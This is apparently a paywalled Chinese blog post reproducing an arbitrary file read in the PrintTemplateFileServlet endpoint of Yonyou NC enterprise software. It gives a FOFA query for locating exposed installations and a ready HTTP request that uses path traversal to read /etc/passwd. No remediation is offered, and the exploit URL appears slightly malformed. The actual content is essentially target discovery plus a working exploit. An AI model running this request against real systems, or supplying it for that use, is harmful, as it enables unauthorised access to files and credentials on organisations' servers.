超级会员免费看
本文详细介绍了用友NC PrintTemplateFileServlet接口存在的任意文件读取漏洞,描述了漏洞如何允许攻击者进行任意文件读取,以及此漏洞对用友NC系统的影响范围。
简介
随着科技的飞速发展,企业管理面临着日益复杂和多样化的挑战。为了提高企业管理效率和决策水平,用友NC作为一种综合性企业管理软件应运而生。用友NC是用友集团旗下的重要产品,致力于为企业提供全面的集成化解决方案。本文将深入探讨用友NC的含义和功能,以及它在企业管理中的关键作用。
漏洞描述
用友NC PrintTemplateFileServlet 接口存在任意文件读取漏洞,攻击者可以通过该漏洞进行任意文件读取。
影响范围
用友NC
fofa语句:app="用友-UFIDA-NC"
漏洞复现
GET /servlet/~uapweb/nc.lfw.billtemplate.servlet.PrintTemplateFileServletfilePath=../../../etc/passwd HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0
订阅专栏 解锁全文
扫一扫
163
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
